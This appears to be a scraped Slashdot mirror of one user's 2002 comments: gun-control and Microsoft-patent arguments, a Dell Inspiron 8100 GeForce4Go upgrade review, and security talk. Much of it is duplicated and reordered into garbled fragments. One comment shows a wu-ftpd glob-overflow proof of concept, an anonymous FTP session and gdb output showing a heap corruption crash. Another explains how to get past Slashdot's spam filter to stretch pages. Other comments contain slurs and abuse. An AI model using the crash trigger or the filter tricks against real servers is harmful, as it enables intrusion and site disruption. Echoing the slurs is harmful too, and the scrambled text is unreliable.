A dangerous person is a lot more dangerous with a gun than without. It takes mental and physical capability to do any level of damage to the safety of others. If the person is mentally capable of mass murder, making him physically capable is the ultimate insanity.
A dangerous person will find a way to arm himself regardless of the law. Removing my right to own arms is nothing more than removing my legal right to defend myself and my family. If a person is mentally capable of mass murder, he will find a way to make himself physically capable. If he is physically capable, making the rest of us physically incapable of defending ourselves is the ultimate insanity.
This is something like patenting keys and locks. Obviously, if Microsoft ever tried to say something like: "No, you can't view your documents", I think the justice department would immediately step in and cry foul, much as if the person who invented the key demanded that all people who owned and used keys for operating locks pay him a surcharge or discontinue their use. I think he raises the interesting point... (Score:4) by Ieshan (ieshan@[ ]iaone.net ['med' in gap]) on Wednesday August 21, @10:54PM (#4116497) (User #409693 Info | http://slashdot.org/) And the point is, humans have been allowed to patent standardized tools.
"Now I need a monopolist's permission to view my own creations? The audacity is mind-boggling, and that the Justice Department is permitting it is simply astounding."
This is something like patenting keys and locks. Obviously, if Microsoft ever tried to say something like: "No, you can't view your documents", I think the justice department would immediately step in and cry foul, much as if the person who invented the key demanded that all people who owned and used keys for operating locks pay him a surcharge or discontinue their use.
"But I can't get into my house!", people would cry. They'd use the key anyway, and popular demand would win; much the same in the Microsoft case.
Microsoft didn't patent the key. Microsoft patented a particular style of key. In fact, they patented an ugly yet very effective key that works well and has been adopted by many because it is quite effective. Nobody says you can't make your own style keys, but doing so forces you to limit your key's effectiveness to your own lock.
People like to pretend that MS formats are the only formats that exist. They're not.
Since the inception of computers into the mainstream market, enthusiasts have been trying to get more speed out of the machines. This has been undoubtedly so for laptops since the first luggables. These "portable" computers, with CRT screens and heavy metal cases were the precursors to laptops. However, the progression into LCDs, and mobile modern processors has lead the way to faster and more useful machines. Battery life has always dictated the amount of speed a laptop could provide. In the past, a businessman could only squeeze one hour out of their laptop, now slim ultra portables go for more than 7 hours on one battery. So called "portable desktops" have always been a myth since the power of laptops have always been held by the battery constraints. Hard drives remain a large obstacle to the speed of laptops, although it will be solved sometime in the future. However, there has always been one place where laptops have lagged behind their desktop brethren, and that is the video card.
While video cards have always led in desktop platforms, they have always lagged in notebooks. S3, NeoLogic, and others always provided some type of display chips, but they were never adequate for 3D gaming. With the advent of the ATI mobility chips, the start of mobile gaming was upon portable computers. These chips progressed, Dell incorporated the Radeon Mobility M4 into their 8000 line of laptops. Nvidia eventually released the GeForce2go, which was heralded as the beginning of mobile gaming, Dell Inspiron 8100 laptops were the first to be equipped with the GF2go. The next generation, released at the beginning of this year is the Inspiron 8200, and with it came the next generation in mobile graphics, the GeForce4Go 440. Many say that the GF4go is not actually a Geforce 4 GPU but merely a tweaked GF2go. However, the core and memory speeds are almost double that of the GF2go. In addition, many of the shortcomings of the GF2go were addressed and some of the instructions incorporated into the GF3 were put into the GF4go. What was produced was an energy efficient, but powerful GPU. It was only a matter of time that people would find a way to modify their past laptops in order to use these new, more powerful chips.
This spring, when the I8200 was released, I was looking for a laptop in which I could travel across the country while bringing a gaming system with. The 8100 had a very good price, but lacked in the video card arena. The ATI 7500 was much better than the GF2go, but was still lackluster. One day I was browsing a forum when I noticed a fellow modder had gotten his 8100 to run the GF4go. Intrigued, I conversed with him and eventually visited the Delltalk forums. This led me to find that notebooks had finally broken the final barrier; they were now almost completely upgradeable. Since the 8000 series, Dell has incorporated socket type connectors for video cards, CPUs, and mini-PCI ports. This is a far cry from soldered CPUs, GPUs, and RAM. Owners for two year old laptops were rejuvenating them with the fastest technology, and newer notebooks (8100's) were also joining in. The process was not even that difficult - four screws on the bottom of the laptop removed the keyboard and three more and you were able to get the video card off of the motherboard. Right next to it lies the socketed CPU which can also be changed. You can see the guide here. Yeah, it looks crazy but it does work.
The only difficult part to the upgrade was the drivers for the GPU. Since Dell has blazed the trail, the drivers they have are very immature. However, with dll combining through different Nvidia Detonator Drivers, D-Force has been able to compile up to date drivers for these powerful chips. In order to get a good understanding of the power of this new chip, I will compare it to the other two major video chipsets today, the ATI Radeon 7500 64MB and the Geforce2go. While one could just buy a 8200, this upgrade option is much more appealing, especially considering the high price tag the 8200 commands, and the fact that since the 8100 has been discontinued, you can find good deals on certain auction sites.
The test setup is as follows:
Dell Inspiron 8100 Pentium 3-M 1.0ghz 320mb PC133 ram, 1-256MB Crucial and 64MB Dell ram GeForce4go 440 64MB DDR ram 15" UltraXGA 1600x1200 TFT 20GB Fujitsu hard drive 8x DVD-rom WindowsXP Professional I will be testing the chip using Unreal Tournament, Quake3, DroneZ, MDK2, and 3d Mark 2001. For comparison I will use previous benchmarks by Darth in this review.
The 8000 series of Dell laptops are quite different from the "traditional" approach to building laptops. As previously mentioned, most equipment was soldered onto the motherboard and you could not upgrade the laptop at all. However, with the 8000 series, and even more modern laptops from other manufacturers, they have changed to a socketed design for the CPUs and a type of AGP slot for video cards along with the mini-PCI slot shown below.
As you can see, the P3-M CPU rests in an interesting socket design with an even more interesting heat sink. Heatpipes, made popular on desktop CPUs by Vantec have become more pronounced in other areas. The space-constrained laptops with faster processors have needed a way to wick away the heat in more efficient ways than the traditional CPUs. The 8100's heatpipe for the CPU does this, routing the heat to a radiator-type heatsink at the end where two high-speed fans are placed. An interesting thing about these fans is that they are temperature controlled. However, the BIOS for the 8100 sets them to go into high speed around 75 degrees C. However, you can download a nifty little program called "FanGUI" made for 8k Inspirons and a few other Dell laptops which can control the fans speeds by user set parameters, or manual control. Its a virtual baybus.
When looking at the video card, you will notice a plastic cover. Many people thought that this was some type of TIM (thermal transfer material). However, plastic does not make a good TIM. Upon further digging people found that it was actually an EMI shield which Dell placed on the video card in order to protect it from the various components that throw off emissions. Looking closer at the video card you can see the ram chips are BGA ram which reduces heat held by the chip and surface area needed for mounting.
The "AGP" slot, which you can see above, is just a simple double edged connector placed on the motherboard. This is probably the most exciting feature of this laptop. The existence of this slot means that you can use the Radeon Mobile M4, GF2go, Radeon 7500, GF4go, and perhaps even future video cards. People who have the 8000 have been successful in upgrading a 2 year old laptop to the most current in video technology. However, this is not true in all cases. 8100's have all been able to use GF4go's that are only really supported by Dell in the 8200 series.
The heatpipe technology that aids the CPU in cooling is also present for the GPU. However, the heatpipe does not contact the GPU very well and I was thinking of finding out the gap and placing some type of copper shim between the two surfaces. This would not be a simple matter since you have to also remember the keyboard would impact upon the GPU.
The drivers for the GF4go are still pretty immature and people have looked for ways to come up with their own. Drivers from D-Force or "cybercookie" on the Delltalk forums perform this function. These drivers support nearly all of the functionality of the GF4go, including Nview. However, they do not have support for the PowerMizer capabilities for this chip. However, previous driver versions have and the battery savings are not the significant.
On a side note, the overclocking capability of the GF4go seems to be non-existant. I tried using several of the GFx tweakers and none have been able to overclock the card, even Nvidia's Coolbits does not seem to have any effect on the speed of the GPU or RAM. Furthermore, many people warn against doing this considering the high heat conditions in the laptop and the stresses that further heat would place on your computer.
I don't know about that, considering in the last month we had 2 big exploits (openssh, and libc resolve bug). The advice for the libc bug was to cvsup the whole system, cause lots of stuff depended on that.
The openssh bug had a one line workaround.
The libc resolver bug has not been successfully exploited yet (so it's not really an exploit). It SEEMS POSSIBLE to exploit it, yes, but it's not trivial (it involves messing up dns replies, so you'd have to have control over an ip block, force the resolver to try to resolve an ip in that block, send the bad response, and then hope it worked). If you know anything about the bsd source code, you know that you can cd/usr/src/lib/libc && make all install. True, it doesn't help statically compiled binaries, but how much do you have on y our system that's statically linked AND answers on remote IPs? certainly not bind, apache, sendmail, or qpopper... or any of the other standard services.
Could one say that adding more capabilities and packaged programs to the OS make it less secure?
uh, yes? does that shock you? everytime you install software, you increase your potential for a security hole. why do you think there were so many code-red victims? because they installed everything on the cd, including IIS 5.0, when they didnt need it. more software, more holes, more problems.
The article was counting the number of exploits, not the frequency with which they were exploited.
It does make some sense. Much of the windows exploits are serious and make news, but many of the linux/unix exploits are ignored except by those who happen to be running the given piece of software.
If you read rootprompt or securityfocus, you'll see that every week there's 10-14 new linux/unix exploits/holes. That really is a large problem, regardless of how quickly they're fixed by the developers.
1) If the rest of your post is valid, and there's just one long string, it will insert a space in the middle of it. (Valid is actually defined by compressability, so lots of different characters.. That's why you'll see text cut/pasted into the junk posts, and that's why you'll see a lot of just completely bullshit posts allowed through). If the filter determines theres little chance that there is valid content, it aborts.
2) The page widening post that's pissing everyone (myself included), is a nesting of blockquotes in the following manner:
What's that do? each blockquote nests one more, causing a bunch of indentations. It's similar to nesting a bunch of lists (<ul> <ul> <li> random characters, all M's seems to be the favorite </li> </ul> </ul> )
Also, the code wont cut hyperlinks, just plain text. So, if you want to link to a site longer than 50 characters, make sure it's a link, and not just text, or the space will show up.
There's a shitload of other tricks... the page lengthening method is to keep all of the <br>'s within the same hyperlink, because the code doesnt search for crap inside the hyperlink text like it does in plain text....
I could go on, but I think you get the point. There's lots of holes. New ones will be found. Unfortunately, they seem to get worse and worse, no matter how many are fixed.
In the interview, Austin acknowledged that he vandalized the Web sites and that he knew it was illegal to do so.
SO where's the problem?
You've got a kid, who cracks into sites, defaces them, and produces bomb-making instructions on his own site. The illegal acts justify "raiding" his residence, and the history of hostility justifies the show of force.
yea, sorting by "oldest first" makes arguments obsolete, jackass.
you could also look at the comment id number (#2883848 for you) and compare it... it's just an incremented number, really easy to see which came first.
dont post your shit at -1 by default. the only people who get stuck seeing it are trolls and crapflooders. if you fucking must post your mindless shit, at least find yourself a decent account, and post it at 1 or 2, so everyone else has to see it, at least for a little while.
and another thing... crapflood something worthwhile. Porn stories are always entertaining. if you dont have any, http://www.join4free.com is always a good place to look
The windows installer actually performs somewhat intelligently.
You can test this yourself: take a computer, and install a clean version of win2k or winxp on it. Make sure this computer has an intel chip in it. Once it's up and running, take the hard drive, and put it into an amd box. Windows will update some drivers to match the new hardware, but not all of them. Then, run your favorite benchmark (distributed.net, seti, quake, whatever) on the amd chip running on a system designed for intel. Then, reformat and reinstall win2k/winxp onto the same box, with the amd chip, and re-run the benchmarks. Performance will be about 5-6% improved, because a lot of the core code is optimized based on the processor at the time of installation.
Yes, there was a very similar globbing hole in many ftp servers (including the BSD ftpd server that comes in FreeBSD)... The problem is that nobody was ever TOLD to audit the code, and because of that, nobody ever did... a problem with volunteer software, nobody's held accountable.
For everyone who wants to see how it works...
Simple glob overflow, by adding special characters ( { or [ ) to the end of a request . This provides a way to slip, and execute, shell code onto the heap... :
ftp> open localhost
Connected to localhost (127.0.0.1).
220 host FTP server (Version wu-2.6.1-18) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection
1405 ? S 0:00 ftpd: accepting connections on port 21
7611 tty3 S 1:29 gdb/usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd:
host:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program:/usr/sbin/wu.ftpd, process 26256
Symbols already loaded for/lib/libcrypt.so.1
Symbols already loaded for/lib/libnsl.so.1
Symbols already loaded for/lib/libresolv.so.2
Symbols already loaded for/lib/libpam.so.0
Symbols already loaded for/lib/libdl.so.2
Symbols already loaded for/lib/i686/libc.so.6
Symbols already loaded for/lib/ld-linux.so.2
Symbols already loaded for/lib/libnss_files.so.2
Symbols already loaded for/lib/libnss_nisplus.so.2
Symbols already loaded for/lib/libnss_nis.so.2
0x40165544 in __libc_read () from/lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136 3136 in malloc.c
Fun stuff. It's been on the freebsd security list since a few days ago.
I've got 8 286's in my closet from my parent's old business (it got sold in 1989, the computers were already too old to be transferred to the new parent company, so I took them)....
one of these days i'm gonna fire those bastards up, and see if anything (*bsd) will run on them (the only thing I remember seeing on them is some form of dos/xtree, but I was 8 at the time)..
Slashdot Mirror
A dangerous person is a lot more dangerous with a gun than without. It takes mental and physical capability to do any level of damage to the safety of others. If the person is mentally capable of mass murder, making him physically capable is the ultimate insanity.
A dangerous person will find a way to arm himself regardless of the law. Removing my right to own arms is nothing more than removing my legal right to defend myself and my family. If a person is mentally capable of mass murder, he will find a way to make himself physically capable. If he is physically capable, making the rest of us physically incapable of defending ourselves is the ultimate insanity.
More evidence that the leftists in charge of the EU are no different than those formerly in charge of the Soviet Union.
Freedom takes a back seat to political correctness.
You're using a flawed analogy.
This is something like patenting keys and locks. Obviously, if Microsoft ever tried to say something like: "No, you can't view your documents", I think the justice department would immediately step in and cry foul, much as if the person who invented the key demanded that all people who owned and used keys for operating locks pay him a surcharge or discontinue their use.
I think he raises the interesting point... (Score:4)
by Ieshan (ieshan@[ ]iaone.net ['med' in gap]) on Wednesday August 21, @10:54PM (#4116497)
(User #409693 Info | http://slashdot.org/)
And the point is, humans have been allowed to patent standardized tools.
"Now I need a monopolist's permission to view my own creations? The audacity is mind-boggling, and that the Justice Department is permitting it is simply astounding."
This is something like patenting keys and locks. Obviously, if Microsoft ever tried to say something like: "No, you can't view your documents", I think the justice department would immediately step in and cry foul, much as if the person who invented the key demanded that all people who owned and used keys for operating locks pay him a surcharge or discontinue their use.
"But I can't get into my house!", people would cry. They'd use the key anyway, and popular demand would win; much the same in the Microsoft case.
Microsoft didn't patent the key. Microsoft patented a particular style of key. In fact, they patented an ugly yet very effective key that works well and has been adopted by many because it is quite effective. Nobody says you can't make your own style keys, but doing so forces you to limit your key's effectiveness to your own lock.
People like to pretend that MS formats are the only formats that exist. They're not.
Below is the text of the first two pages ... which includes the how-to, but none of the benchmarks or conclusions.
Manufacturer: Dell
Street Price: $1,200
Review By: LegendKiller
Review Date: 08/12/02
Introduction
Since the inception of computers into the mainstream market, enthusiasts have been trying to get more speed out of the machines. This has been undoubtedly so for laptops since the first luggables. These "portable" computers, with CRT screens and heavy metal cases were the precursors to laptops. However, the progression into LCDs, and mobile modern processors has lead the way to faster and more useful machines. Battery life has always dictated the amount of speed a laptop could provide. In the past, a businessman could only squeeze one hour out of their laptop, now slim ultra portables go for more than 7 hours on one battery. So called "portable desktops" have always been a myth since the power of laptops have always been held by the battery constraints. Hard drives remain a large obstacle to the speed of laptops, although it will be solved sometime in the future. However, there has always been one place where laptops have lagged behind their desktop brethren, and that is the video card.
While video cards have always led in desktop platforms, they have always lagged in notebooks. S3, NeoLogic, and others always provided some type of display chips, but they were never adequate for 3D gaming. With the advent of the ATI mobility chips, the start of mobile gaming was upon portable computers. These chips progressed, Dell incorporated the Radeon Mobility M4 into their 8000 line of laptops. Nvidia eventually released the GeForce2go, which was heralded as the beginning of mobile gaming, Dell Inspiron 8100 laptops were the first to be equipped with the GF2go. The next generation, released at the beginning of this year is the Inspiron 8200, and with it came the next generation in mobile graphics, the GeForce4Go 440. Many say that the GF4go is not actually a Geforce 4 GPU but merely a tweaked GF2go. However, the core and memory speeds are almost double that of the GF2go. In addition, many of the shortcomings of the GF2go were addressed and some of the instructions incorporated into the GF3 were put into the GF4go. What was produced was an energy efficient, but powerful GPU. It was only a matter of time that people would find a way to modify their past laptops in order to use these new, more powerful chips.
This spring, when the I8200 was released, I was looking for a laptop in which I could travel across the country while bringing a gaming system with. The 8100 had a very good price, but lacked in the video card arena. The ATI 7500 was much better than the GF2go, but was still lackluster. One day I was browsing a forum when I noticed a fellow modder had gotten his 8100 to run the GF4go. Intrigued, I conversed with him and eventually visited the Delltalk forums. This led me to find that notebooks had finally broken the final barrier; they were now almost completely upgradeable. Since the 8000 series, Dell has incorporated socket type connectors for video cards, CPUs, and mini-PCI ports. This is a far cry from soldered CPUs, GPUs, and RAM. Owners for two year old laptops were rejuvenating them with the fastest technology, and newer notebooks (8100's) were also joining in. The process was not even that difficult - four screws on the bottom of the laptop removed the keyboard and three more and you were able to get the video card off of the motherboard. Right next to it lies the socketed CPU which can also be changed. You can see the guide here. Yeah, it looks crazy but it does work.
The only difficult part to the upgrade was the drivers for the GPU. Since Dell has blazed the trail, the drivers they have are very immature. However, with dll combining through different Nvidia Detonator Drivers, D-Force has been able to compile up to date drivers for these powerful chips. In order to get a good understanding of the power of this new chip, I will compare it to the other two major video chipsets today, the ATI Radeon 7500 64MB and the Geforce2go. While one could just buy a 8200, this upgrade option is much more appealing, especially considering the high price tag the 8200 commands, and the fact that since the 8100 has been discontinued, you can find good deals on certain auction sites.
The test setup is as follows:
Dell Inspiron 8100
Pentium 3-M 1.0ghz
320mb PC133 ram, 1-256MB Crucial and 64MB Dell ram
GeForce4go 440 64MB DDR ram
15" UltraXGA 1600x1200 TFT
20GB Fujitsu hard drive
8x DVD-rom
WindowsXP Professional
I will be testing the chip using Unreal Tournament, Quake3, DroneZ, MDK2, and 3d Mark 2001. For comparison I will use previous benchmarks by Darth in this review.
The 8000 series of Dell laptops are quite different from the "traditional" approach to building laptops. As previously mentioned, most equipment was soldered onto the motherboard and you could not upgrade the laptop at all. However, with the 8000 series, and even more modern laptops from other manufacturers, they have changed to a socketed design for the CPUs and a type of AGP slot for video cards along with the mini-PCI slot shown below.
As you can see, the P3-M CPU rests in an interesting socket design with an even more interesting heat sink. Heatpipes, made popular on desktop CPUs by Vantec have become more pronounced in other areas. The space-constrained laptops with faster processors have needed a way to wick away the heat in more efficient ways than the traditional CPUs. The 8100's heatpipe for the CPU does this, routing the heat to a radiator-type heatsink at the end where two high-speed fans are placed. An interesting thing about these fans is that they are temperature controlled. However, the BIOS for the 8100 sets them to go into high speed around 75 degrees C. However, you can download a nifty little program called "FanGUI" made for 8k Inspirons and a few other Dell laptops which can control the fans speeds by user set parameters, or manual control. Its a virtual baybus.
When looking at the video card, you will notice a plastic cover. Many people thought that this was some type of TIM (thermal transfer material). However, plastic does not make a good TIM. Upon further digging people found that it was actually an EMI shield which Dell placed on the video card in order to protect it from the various components that throw off emissions. Looking closer at the video card you can see the ram chips are BGA ram which reduces heat held by the chip and surface area needed for mounting.
The "AGP" slot, which you can see above, is just a simple double edged connector placed on the motherboard. This is probably the most exciting feature of this laptop. The existence of this slot means that you can use the Radeon Mobile M4, GF2go, Radeon 7500, GF4go, and perhaps even future video cards. People who have the 8000 have been successful in upgrading a 2 year old laptop to the most current in video technology. However, this is not true in all cases. 8100's have all been able to use GF4go's that are only really supported by Dell in the 8200 series.
The heatpipe technology that aids the CPU in cooling is also present for the GPU. However, the heatpipe does not contact the GPU very well and I was thinking of finding out the gap and placing some type of copper shim between the two surfaces. This would not be a simple matter since you have to also remember the keyboard would impact upon the GPU.
The drivers for the GF4go are still pretty immature and people have looked for ways to come up with their own. Drivers from D-Force or "cybercookie" on the Delltalk forums perform this function. These drivers support nearly all of the functionality of the GF4go, including Nview. However, they do not have support for the PowerMizer capabilities for this chip. However, previous driver versions have and the battery savings are not the significant.
On a side note, the overclocking capability of the GF4go seems to be non-existant. I tried using several of the GFx tweakers and none have been able to overclock the card, even Nvidia's Coolbits does not seem to have any effect on the speed of the GPU or RAM. Furthermore, many people warn against doing this considering the high heat conditions in the laptop and the stresses that further heat would place on your computer.
I don't know about that, considering in the last month we had 2 big exploits (openssh, and libc resolve bug). The advice for the libc bug was to cvsup the whole system, cause lots of stuff depended on that.
The openssh bug had a one line workaround.
The libc resolver bug has not been successfully exploited yet (so it's not really an exploit). It SEEMS POSSIBLE to exploit it, yes, but it's not trivial (it involves messing up dns replies, so you'd have to have control over an ip block, force the resolver to try to resolve an ip in that block, send the bad response, and then hope it worked). If you know anything about the bsd source code, you know that you can cd
yea, moron, the day you need a 64 bit chip with 3 megs of onboard cache is the day you're realize how dumb you really are.
Open source haven't proven more secure than closed, as the theory about "given enough eyes all bugs are shallow" says.
you should always include a link so it shows you're not making shit up.
Could one say that adding more capabilities and packaged programs to the OS make it less secure?
uh, yes? does that shock you? everytime you install software, you increase your potential for a security hole. why do you think there were so many code-red victims? because they installed everything on the cd, including IIS 5.0, when they didnt need it. more software, more holes, more problems.
The article was counting the number of exploits, not the frequency with which they were exploited .
It does make some sense. Much of the windows exploits are serious and make news, but many of the linux/unix exploits are ignored except by those who happen to be running the given piece of software.
If you read rootprompt or securityfocus, you'll see that every week there's 10-14 new linux/unix exploits/holes. That really is a large problem, regardless of how quickly they're fixed by the developers.
a few corrections...
... the page lengthening method is to keep all of the <br>'s within the same hyperlink, because the code doesnt search for crap inside the hyperlink text like it does in plain text....
1) If the rest of your post is valid, and there's just one long string, it will insert a space in the middle of it. (Valid is actually defined by compressability, so lots of different characters.. That's why you'll see text cut/pasted into the junk posts, and that's why you'll see a lot of just completely bullshit posts allowed through). If the filter determines theres little chance that there is valid content, it aborts.
2) The page widening post that's pissing everyone (myself included), is a nesting of blockquotes in the following manner:
<BLOCKQUOTE><BLOCKQUOTE>random link </BLOCKQUOTE>
<BLOCKQUOTE><BLOCKQUOTE>random link2 </BLOCKQUOTE>
<BLOCKQUOTE><BLOCKQUOTE>random link3 </BLOCKQUOTE>
<BLOCKQUOTE><BLOCKQUOTE>random link4 </BLOCKQUOTE>
What's that do? each blockquote nests one more, causing a bunch of indentations. It's similar to nesting a bunch of lists (<ul> <ul> <li> random characters, all M's seems to be the favorite </li> </ul> </ul> )
Also, the code wont cut hyperlinks, just plain text. So, if you want to link to a site longer than 50 characters, make sure it's a link, and not just text, or the space will show up.
There's a shitload of other tricks
I could go on, but I think you get the point. There's lots of holes. New ones will be found. Unfortunately, they seem to get worse and worse, no matter how many are fixed.
yet they've not replaced any of their windows desktops, have they?
the only operating systems linux will ever kill are unix based.
He wasnt raided because of the content on the site...
He was raided because he hacked into, and then defaced, commercial sites.
In the interview, Austin acknowledged that he vandalized the Web sites and that he knew it was illegal to do so.
SO where's the problem?
You've got a kid, who cracks into sites, defaces them, and produces bomb-making instructions on his own site. The illegal acts justify "raiding" his residence, and the history of hostility justifies the show of force.
I see no problem here.
oh come on, indymedia is about as respectable as the fucking inquirer.
yea, sorting by "oldest first" makes arguments obsolete, jackass.
... it's just an incremented number, really easy to see which came first.
you could also look at the comment id number (#2883848 for you) and compare it
hey you fucking cock....
... crapflood something worthwhile. Porn stories are always entertaining. if you dont have any, http://www.join4free.com is always a good place to look
dont post your shit at -1 by default. the only people who get stuck seeing it are trolls and crapflooders. if you fucking must post your mindless shit, at least find yourself a decent account, and post it at 1 or 2, so everyone else has to see it, at least for a little while.
and another thing
- Anomymous Coward
The windows installer actually performs somewhat intelligently.
You can test this yourself: take a computer, and install a clean version of win2k or winxp on it. Make sure this computer has an intel chip in it. Once it's up and running, take the hard drive, and put it into an amd box. Windows will update some drivers to match the new hardware, but not all of them. Then, run your favorite benchmark (distributed.net, seti, quake, whatever) on the amd chip running on a system designed for intel. Then, reformat and reinstall win2k/winxp onto the same box, with the amd chip, and re-run the benchmarks. Performance will be about 5-6% improved, because a lot of the core code is optimized based on the processor at the time of installation.
I'm not entirely impressed ...
we've had switches in the wall jacks for quite a while...
Yes, there was a very similar globbing hole in many ftp servers (including the BSD ftpd server that comes in FreeBSD)... The problem is that nobody was ever TOLD to audit the code, and because of that, nobody ever did ... a problem with volunteer software, nobody's held accountable.
For everyone who wants to see how it works ...
... :
/usr/sbin/wu.ftpd /usr/sbin/wu.ftpd, process 26256 /lib/libcrypt.so.1 /lib/libnsl.so.1 /lib/libresolv.so.2 /lib/libpam.so.0 /lib/libdl.so.2 /lib/i686/libc.so.6 /lib/ld-linux.so.2 /lib/libnss_files.so.2 /lib/libnss_nisplus.so.2 /lib/libnss_nis.so.2 /lib/i686/libc.so.6
Simple glob overflow, by adding special characters ( { or [ ) to the end of a request . This provides a way to slip, and execute, shell code onto the heap
ftp> open localhost
Connected to localhost (127.0.0.1).
220 host FTP server (Version wu-2.6.1-18) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection
1405 ? S 0:00 ftpd: accepting connections on port 21
7611 tty3 S 1:29 gdb
26256 ? S 0:00 ftpd: host:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program:
Symbols already loaded for
Symbols already loaded for
Symbols already loaded for
Symbols already loaded for
Symbols already loaded for
Symbols already loaded for
Symbols already loaded for
Symbols already loaded for
Symbols already loaded for
Symbols already loaded for
0x40165544 in __libc_read () from
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136 3136 in malloc.c
Fun stuff. It's been on the freebsd security list since a few days ago.
where's your penis bird?
mine's registered in idaho, not oregon
a few hundred bucks cheaper / year, fun stuff
I've got 8 286's in my closet from my parent's old business (it got sold in 1989, the computers were already too old to be transferred to the new parent company, so I took them)....
..
one of these days i'm gonna fire those bastards up, and see if anything (*bsd) will run on them (the only thing I remember seeing on them is some form of dos/xtree, but I was 8 at the time)
well ...
try this or this.
not that either are really worthwhile, but occasionally they're entertaining.
ya know ... that had to be one of the better posts on /. this morning ... its a shame moderators are gay, humorless queers.